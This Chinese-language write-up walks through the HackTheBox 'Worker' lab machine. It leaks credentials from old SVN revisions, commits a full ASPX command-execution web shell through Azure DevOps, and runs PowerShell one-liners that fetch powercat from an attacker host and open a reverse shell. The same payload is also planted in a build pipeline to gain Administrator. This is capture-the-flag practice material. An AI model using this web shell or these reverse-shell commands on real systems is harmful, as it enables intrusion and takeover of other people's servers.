Avatar {{帝力于我何有哉}} 不疯魔,不成活。 Be obsessed, or be average.

HackTheBox >_ Worker_203

Published on 02 Feb 2021

Worker_203

$ svn list svn://10.10.10.203 dimension.worker.htb/ moved.txt

通过 svn cat 读取文件得到第二个域名

dimension.worker.htb devops.worker.htb

域名加入hosts

dimension.worker.htb

<a href="http://alpha.worker.htb/">Alpha</a><p>This is our first page</p> 
<a href="http://cartoon.worker.htb/">Cartoon</a><p>When we're not working we enjoy watching cartoons. Guess who in our team is what cartoon character!</p>
<a href="http://lens.worker.htb/">Lens</a><p>This page is for you 40+:ers. Can you read it?</p>
<a href="http://solid-state.worker.htb/">Solid State</a><p>We save our data in our datacenter on blazing fast solid-state storage.</p>
<a href="http://spectral.worker.htb/">Spectral</a><p>Sounds almost like one of our favourite agents movies, but we also enjoy Hamilton</p>
<a href="http://story.worker.htb/">Story</a><p>Lets make a long story short, end of story</p>

devops.worker.htb

10.10.10.203    devops.worker.htb
10.10.10.203    dimension.worker.htb
10.10.10.203    alpha.worker.htb
10.10.10.203    cartoon.worker.htb
10.10.10.203    lens.worker.htb
10.10.10.203    solid-state.worker.htb
10.10.10.203    spectral.worker.htb
10.10.10.203    story.worker.htb

逐个查看似乎没有多余的线索。 继续枚举svn

使用checkout 命令检查

$ svn checkout svn://10.10.10.203                                                                             │
A    dimension.worker.htb                                                                                     │
A    dimension.worker.htb/LICENSE.txt                                                                         │
A    dimension.worker.htb/README.txt                                                                          │
A    dimension.worker.htb/assets                                                                              │
A    dimension.worker.htb/assets/css                                                                          │
A    dimension.worker.htb/assets/css/fontawesome-all.min.css                                                  │
A    dimension.worker.htb/assets/css/main.css                                                                 │
A    dimension.worker.htb/assets/css/noscript.css                                                             │
A    dimension.worker.htb/assets/js       
...
A    dimension.worker.htb/images                                                                              │
A    dimension.worker.htb/images/bg.jpg                                                                       │
A    dimension.worker.htb/images/overlay.png                                                                  │
A    dimension.worker.htb/images/pic01.jpg                                                                    │
A    dimension.worker.htb/images/pic02.jpg                                                                    │
A    dimension.worker.htb/images/pic03.jpg                                                                    │
A    dimension.worker.htb/index.html                                                                          │
A    moved.txt                                                                                                │
Checked out revision 5.

得到Checked out revision 5 使用 svn diff 命令和 -r 参数指定小于5的任何数字来查看各个版本的更新

得到可能的凭证

nathen:wendel98

尝试在之前的web页面进行登陆

登陆成功

登陆成功后可在 smarthotel360中的repos下的pull requests中发现之前发现的各个网站,我们可以通过更新这些网页的代码,来将rshell传输上去,尝试获得revers shell

先选择想修改的项目,尝试修改alpha

选择file

再选择新建的分支

再在文件目录处选择新增文件

新增一个web_shell.aspx,写入代码,

并点击commit进行存档

或者在本地建立文件,然后使用上传功能进行上传

<%@ Page Language="VB" Debug="true" %>
<%@ import Namespace="system.IO" %>
<%@ import Namespace="System.Diagnostics" %>

<script runat="server">      
Sub RunCmd(Src As Object, E As EventArgs)            
  Dim myProcess As New Process()            
  Dim myProcessStartInfo As New ProcessStartInfo(xpath.text)            
  myProcessStartInfo.UseShellExecute = false            
  myProcessStartInfo.RedirectStandardOutput = true            
  myProcess.StartInfo = myProcessStartInfo            
  myProcessStartInfo.Arguments=xcmd.text            
  myProcess.Start()            
  Dim myStreamReader As StreamReader = myProcess.StandardOutput            
  Dim myString As String = myStreamReader.Readtoend()            
  myProcess.Close()            
  mystring=replace(mystring,"<","&lt;")            
  mystring=replace(mystring,">","&gt;")            
  result.text= vbcrlf & "<pre>" & mystring & "</pre>"    
End Sub
</script>

<html>
<body>    
<form runat="server">        
<p><asp:Label id="L_p" runat="server" width="80px">Program</asp:Label>        
<asp:TextBox id="xpath" runat="server" Width="300px">c:\windows\system32\cmd.exe</asp:TextBox>        
<p><asp:Label id="L_a" runat="server" width="80px">Arguments</asp:Label>        
<asp:TextBox id="xcmd" runat="server" Width="300px" Text="/c net user">/c net user</asp:TextBox>        
<p><asp:Button id="Button" onclick="runcmd" runat="server" Width="100px" Text="Run"></asp:Button>        
<p><asp:Label id="result" runat="server"></asp:Label>       
</form>
</body>
</html>

然后pull request

将修改更新到网站

执行命令

powershell -c "IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.14.78:8080/powercat.ps1');powercat -c 10.10.14.78 -p 4444 -e cmd

ps> [Environment]::GetLogicalDrives()

发现盘符w

得到很多凭证,查看用户目录,查找我们想得到的用户

得到凭证 robisl:wolves11 靶机是打开了5985的使用winrm登陆

evil-winrm -u robisl -p wolves11 -i 10.10.10.203

使用新凭证重新登录

powershell -c "IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.14.78:8080/powercat.ps1');powercat -c 10.10.14.78 -p 1337 -e cmd

# Starter pipeline
# Start with a minimal pipeline that you can customize to build and deploy your code.
# Add steps that build, run tests, deploy, and more:
# https://aka.ms/yaml

trigger:
- master

pool: 'Setup'

steps:
- powershell: IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.14.78:8080/powercat.ps1');powercat -c 10.10.14.78 -p 1337 -ep
  displayName: 'Run a one-line script'

type “C:\Users\Administrator\Desktop\root.txt”

related posts